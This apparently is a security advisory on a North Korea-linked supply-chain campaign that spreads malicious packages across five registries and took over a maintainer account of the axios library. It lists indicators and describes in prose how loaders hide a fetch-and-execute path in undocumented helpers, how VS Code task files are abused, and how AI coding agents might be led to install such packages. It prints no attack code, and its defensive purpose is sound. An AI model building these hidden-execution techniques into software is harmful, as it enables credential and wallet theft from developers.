Contagious Interview Expands to Five Package Ecosystems

Key Takeaways

• A North Korea-linked threat cluster (tracked by Google as UNC1069, with overlapping designations including Sapphire Sleet and BlueNoroff used by Microsoft and other vendors) has expanded its “Contagious Interview” software supply chain operation to five major open-source package ecosystems: npm, PyPI, Go Modules, crates.io (Rust), and Packagist (PHP). [1]
• Since January 2025, researchers have identified more than 1,700 malicious packages tied to this campaign across all ecosystems, with the cross-ecosystem expansion publicly disclosed on April 7, 2026. [1][2]
• On March 31, 2026, UNC1069 compromised a maintainer account for the widely used axios npm package, injecting a malicious dependency into releases with a combined download volume of approximately 100 million per week. [3][10]
• The malicious packages employ a “factory model” in which the same staged loader pattern is ported across languages with minor code adjustments, reusing shared infrastructure endpoints that expose the campaign’s single operational origin. [1]
• Malicious code is designed to avoid triggering at package installation; it is embedded inside functions matching the package’s advertised purpose, increasing the time-to-detection window and defeating many automated scanning approaches. [1]
• The Security Alliance (SEAL) blocked 164 UNC1069-attributed domains impersonating Microsoft Teams and Zoom between February 6 and April 7, 2026, indicating an active social engineering component that runs in parallel with the supply chain operation. [5]

Background

North Korea’s Contagious Interview operation was first documented by Palo Alto Networks’ Unit 42 in November 2023. It targets software developers through fake technical recruiting campaigns — threat actors pose as hiring professionals at cryptocurrency firms or AI-oriented companies, approach targets via LinkedIn, Telegram, and Slack, and direct them to clone and execute a malicious code repository as part of a fabricated coding assessment. [6] The operation was initially confined almost entirely to npm, where the threat cluster published hundreds of packages impersonating legitimate developer tooling such as express, dotenv, body-parser, and nodemailer. [6]

Attribution for this cluster has evolved as tracking groups converge on overlapping behavioral evidence. Google’s Threat Intelligence Group tracks the actor as UNC1069, a financially motivated, state-nexus threat actor active since at least 2018 that has historically targeted cryptocurrency exchanges and financial institutions. [4] Microsoft tracks overlapping activity as Sapphire Sleet, and other vendors have used the designations BlueNoroff, Stardust Chollima, and TA444 for closely related subgroups within the North Korean Lazarus umbrella. [8][12] Across these designations, the operational focus is consistent: developer-environment compromise, credential and session-token theft from browsers and password managers, and cryptocurrency wallet exfiltration.

By early 2025, researchers tracking the campaign noted increasing sophistication and volume. Socket, which maintains a dedicated Contagious Interview campaign tracker, observed 35 malicious npm packages in a single wave during mid-2025, with over 4,000 combined downloads across that batch. [9] The April 2026 disclosure suggests a qualitative shift in campaign strategy: rather than concentrating primarily on npm, the threat actors now simultaneously maintain a presence across every major open-source distribution channel for web, systems, and backend development.

Security Analysis

Cross-Ecosystem Scale and the Factory Model

Socket’s April 7, 2026 disclosure confirmed that a single UNC1069-linked threat cluster had successfully published staged loaders to npm, PyPI, Go Modules, crates.io, and Packagist within the same operational cycle, reusing the same staging infrastructure and loader patterns across all five registries. [1] The disclosure identified twelve confirmed packages spanning the ecosystems: on npm, packages included dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, and debug-glitz; on PyPI, logutilkit, apachelicense, fluxhttp, and license-utils-kit; on Go Modules, github.com/golangorg/formstash; on crates.io, logtrace; and on Packagist, golangorg/logkit. [1][2]

All of these packages impersonated mundane developer utilities — logging libraries, HTTP helpers, license checkers — categories that enjoy broad organic adoption and infrequent security scrutiny. The shared staging endpoint apachelicense.vercel.app appeared across multiple ecosystem variants, exposing the campaign’s single operational backbone. [1] Researchers characterized this as a “factory model”: the same loader design is ported to each new registry with only the language-idiomatic syntax changed, substantially lowering the cost of expansion while maintaining operational coherence.

Each registry attracts a distinct developer population with different security tooling coverage. Rust and Go ecosystems have, at the time of this writing, seen comparatively lower third-party scanning deployment than the npm ecosystem, and PHP’s Packagist registry has received comparatively less threat-actor attention in prior state-linked campaigns. Distributing malicious packages across all five registries simultaneously maximizes the probability of at least one successful implant on any given developer’s machine and degrades the value of ecosystem-specific monitoring.

Loader Architecture and Hidden Execution

A consistent technical signature distinguishes the Contagious Interview packages from opportunistic commodity malware: malicious code does not execute at package installation. Instead, it is embedded inside functions that perform genuine, documented work — a logging function that logs, an HTTP helper that makes requests — with the malicious payload path hidden in an undocumented helper or triggered by a specific parameter. [1] The PHP package golangorg/logkit, for example, exposes a write_log() function that performs real logging; the malicious execution path sits inside the undocumented helper log_level($tag=1), which contacts the staging endpoint, retrieves a download URL from a JSON response, fetches a platform-specific archive, and executes a second-stage payload. [1]

This design reflects an adaptation to automated scanning defenses. Many dependency scanning systems flag suspicious behavior at install time (install scripts, immediate network calls, eval of downloaded code). By deferring execution until the package is called from within application code, the malicious library passes install-time analysis while silently arming the developer’s environment. The npm variants differ slightly from the other ecosystems: they fetch a base64-encoded JavaScript payload and execute it in memory rather than fetching an archive, which reduces filesystem artifacts. [1]

The second-stage payloads delivered through this infrastructure are malware with combined infostealer and remote access trojan (RAT) capabilities. The campaign has deployed a family of evolving implants across its operational history: BeaverTail (an infostealer and loader written to target JavaScript and Python developer environments), InvisibleFerret (a Python-based backdoor enabling persistent command execution and extended reconnaissance), OtterCookie (a more recent RAT variant observed in late 2025 and early 2026 campaigns), and FlexibleFerret (a macOS-targeted variant). [6][8] All of these payloads are designed to harvest credentials from web browsers, password managers, and locally stored cryptocurrency wallet keys.

The Axios Supply Chain Compromise

On March 31, 2026, between 00:21 and 03:20 UTC, UNC1069 escalated from publishing novel malicious packages to compromising a trusted, existing one. The attackers gained control of an axios npm maintainer account and injected a dependency called plain-crypto-js into two axios releases: version 1.14.1 and version 0.30.4. [3][7][13] Axios is one of the most widely used JavaScript libraries in existence, simplifying HTTP requests for both Node.js and browser environments. At the time of compromise, these two versions collectively represented approximately 100 million weekly downloads. [3][10]

The plain-crypto-js dependency functioned as an obfuscated dropper deploying a new implant, WAVESHAPER.V2, across Windows, macOS, and Linux. WAVESHAPER.V2 is a fully functional RAT: it extracts system telemetry including hostname, username, OS version, time zone, and running process lists; supports in-memory Portable Executable injection and arbitrary shell command execution; and establishes persistent command-and-control channels. [3][8] Google’s Threat Intelligence Group attributed the compromise directly to UNC1069 based on infrastructure and tooling overlaps with prior Contagious Interview activity. [4] The incident was detected and the malicious versions were removed within hours, but the exposure window during a period of active downloads left a substantial number of developer and CI/CD environments potentially seeded.

The Axios compromise is significant beyond its scale. It represents a transition from the creation of novel malicious packages — which require developers to actively choose an unknown library — to the corruption of trusted, established packages that developers and automated pipelines pull without deliberate decision-making. This attack vector, often called a maintainer account takeover, bypasses the adoption friction that limits the reach of typosquatting and brand-impersonation campaigns.

Social Engineering as a Force Multiplier

The supply chain operation does not operate in isolation. In parallel, UNC1069 runs multi-week, low-pressure social engineering campaigns targeting cryptocurrency and Web3 professionals across LinkedIn, Telegram, and Slack. [4][5] Threat actors impersonate known contacts or credible recruitment brands, or they leverage previously compromised company accounts to deliver credibility before presenting a fraudulent Zoom or Microsoft Teams meeting link. The fake meeting interfaces are browser-based, built on legitimate video-conferencing SDKs, and visually indistinguishable from authentic sessions. The initial compromise payload at the meeting stage is typically a single AppleScript file or a terminal copy-paste instruction — no executable installer is involved. [5]

Between February 6 and April 7, 2026, SEAL blocked 164 UNC1069-operated domains impersonating Microsoft Teams and Zoom, providing a concrete measure of the campaign’s social engineering infrastructure scale during that 60-day window. [5] Microsoft’s analysis of recent intrusions observed the introduction of Visual Studio Code as an attack surface: when a victim opens the cloned repository in VS Code and grants trust to the repository author, VS Code automatically executes the repository’s task configuration file, which then fetches and loads the backdoor. [8] This technique integrates naturally into normal developer workflow, making behavioral detection difficult without explicit monitoring of VS Code task execution and outbound network calls from developer workstations.

The integration of supply chain poisoning with social engineering creates a redundant compromise pathway: a developer who resists the social engineering lure may still install a malicious package through normal dependency management, while a developer who scrutinizes their dependencies may succumb to the fake interview channel. The two vectors reinforce each other operationally.

Recommendations

Immediate Actions

Organizations should audit their dependency trees for the confirmed malicious packages identified in this disclosure: on npm, dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, and debug-glitz; on PyPI, logutilkit, apachelicense, fluxhttp, and license-utils-kit; on Go Modules, github.com/golangorg/formstash; on crates.io, logtrace; and on Packagist, golangorg/logkit. Any environment that installed axios versions 1.14.1 or 0.30.4 between March 31, 2026 00:21 and 03:20 UTC should be treated as potentially compromised and subjected to forensic review, with particular attention to outbound network connections, new scheduled tasks, and credential stores accessed during that window.

Security teams should also cross-reference their network telemetry against the 164 UNC1069-attributed domains published by SEAL in their April 2026 advisory, checking for any DNS resolution or outbound connections to those domains from developer workstations, CI/CD systems, or build servers.

Short-Term Mitigations

The technical signature that distinguishes this campaign — deferred execution, staging endpoints, and undocumented helper functions with external network calls — represents a detection opportunity. Organizations should extend dependency scanning beyond install-time analysis to include dynamic execution analysis, or deploy software composition analysis tools capable of performing behavioral analysis on package code before it is invoked in production. Pinning dependencies to verified checksums and maintaining lock files across all five ecosystems (package-lock.json, Pipfile.lock, go.sum, Cargo.lock, composer.lock) limits exposure to version substitution attacks and should be enforced in CI/CD pipelines.

Developer awareness programs should address the specific social engineering lures employed by this campaign. The fake recruiter pattern — urgent outreach via LinkedIn, Telegram, or Slack, followed by a request to clone and run a repository as part of a “technical assessment” — is well-documented across multiple threat intelligence reports and can be translated directly into developer awareness training as a concrete threat scenario rather than a generic phishing warning. Organizations should explicitly instruct developers never to run code from external repositories on their development machines without security review, regardless of the apparent legitimacy of the recruiting context.

Strategic Considerations

The Axios compromise demonstrates that the threat is not limited to obscure packages that developers choose incautiously. The most depended-upon libraries in any ecosystem are high-value targets for maintainer account takeover, and defenses against this vector — particularly mandatory multi-factor authentication for package maintainers and broad adoption of supply chain integrity standards such as Sigstore and SLSA — remain uneven across major registries. Organizations building on open-source foundations should implement controls that assume any dependency could be compromised at any point: artifact integrity verification (SLSA provenance attestation, Sigstore signatures), automated lock-file enforcement, and environment isolation for build and test pipelines that limits the damage radius of a malicious execution event.

The cross-ecosystem expansion observed in this campaign also signals that monitoring programs anchored to a single registry — most commonly npm — are insufficient. Security teams need visibility into PyPI, Go Module proxy activity, Rust crate installations, and PHP Composer activity to detect campaigns of this design. SBOM-based inventorying across all language ecosystems provides the necessary foundation for rapid impact assessment when new indicators of compromise emerge, as they will continue to do as the campaign evolves.

CSA Resource Alignment

This campaign sits at the intersection of several threat dimensions addressed in CSA’s AI Safety Initiative and broader security framework portfolio.

The CSA AI Controls Matrix (AICM), recognized as a 2026 CSO Awards winner, includes an explicit Supply Chain Transparency domain among its 18 security and governance domains. [11] The AICM’s supply chain controls address the verification of AI component provenance and the management of third-party dependencies — principles directly applicable to the developer tooling ecosystem that Contagious Interview exploits. Organizations applying AICM controls should extend the same supply chain scrutiny they apply to AI model dependencies to the general open-source package graph, since the attack surface is continuous.

CSA’s Software Transparency: Securing the Digital Supply Chain publication addresses SBOM generation, OSS risk management, and CI/CD pipeline security — all directly relevant to the mitigations this campaign demands. [14] SBOM-backed dependency inventorying, continuous verification of package integrity, and hardening of CI/CD pipeline trust boundaries are the technical underpinnings of an effective defense against staged-loader supply chain attacks.

An emerging risk amplified by this campaign relates to AI-assisted development environments, which the MAESTRO framework for agentic AI threat modeling directly addresses. [15] AI coding agents that autonomously install, execute, and test packages may interact with compromised packages at elevated speed and with less human review than traditional development workflows. Where AI coding tools invoke package managers on behalf of developers, the attack surface for Contagious Interview-style implants may expand, and the social engineering lure of a fake job interview may be unnecessary when an AI agent can be induced to install a malicious package through manipulated context. This risk vector merits proactive attention as agentic development tooling matures.

CSA’s Zero Trust guidance applies to the post-compromise scenario: developer workstations should be treated as untrusted endpoints within enterprise networks, with lateral movement constrained by least-privilege access controls and continuous verification. [16] The credential-harvesting and remote access capabilities of BeaverTail, InvisibleFerret, and WAVESHAPER.V2 are designed to exploit overprivileged developer environments as a pivot point into broader organizational infrastructure.

References

[1] Socket Security. “North Korea’s Contagious Interview Campaign Spreads Across 5 Ecosystems.” Socket.dev, April 7, 2026.

[2] The Hacker News. “N. Korean Hackers Spread 1,700 Malicious Packages Across npm, PyPI, Go, Rust.” The Hacker News, April 2026.

[3] Google Cloud Blog / Threat Intelligence Group. “North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack.” Google Cloud, 2026.

[4] Google Cloud Blog / Threat Intelligence Group. “UNC1069 Targets Cryptocurrency Sector with New Tooling and AI-Enabled Social Engineering.” Google Cloud, 2026.

[5] Security Alliance (SEAL). “Advisory on DPRK (UNC1069) Fake Microsoft Teams and Zoom Calls.” SEAL Radar, April 2026.

[6] Palo Alto Networks Unit 42. “Contagious Interview: DPRK Threat Actors Lure Tech Industry Job Seekers to Install New Variants of BeaverTail and InvisibleFerret Malware.” Unit 42, October 2024.

[7] Palo Alto Networks Unit 42. “Threat Brief: Widespread Impact of the Axios Supply Chain Attack.” Unit 42, April 2026.

[8] Microsoft Security Blog. “Contagious Interview: Malware Delivered Through Fake Developer Job Interviews.” Microsoft, March 11, 2026.

[9] Socket Security. “Another Wave: North Korean Contagious Interview Campaign Drops 35 New Malicious npm Packages.” Socket.dev, 2025.

[10] Elastic Security Labs. “Inside the Axios Supply Chain Compromise — One RAT to Rule Them All.” Elastic, 2026.

[11] Cloud Security Alliance. “AI Controls Matrix.” CSA, 2025.

[12] Datadog Security Labs. “Tenacious Pungsan: A DPRK Threat Actor Linked to Contagious Interview.” Datadog, October 2024.

[13] StepSecurity. “axios Compromised on npm — Malicious Versions Drop Remote Access Trojan.” StepSecurity, 2026.

[14] Cloud Security Alliance. “Software Transparency: Securing the Digital Supply Chain.” CSA, 2022.

[15] Cloud Security Alliance. “Agentic AI Threat Modeling Framework: MAESTRO.” CSA AI Safety Initiative, February 2025.

[16] Cloud Security Alliance. “Zero Trust Guiding Principles.” CSA Zero Trust Advancement Center, 2024.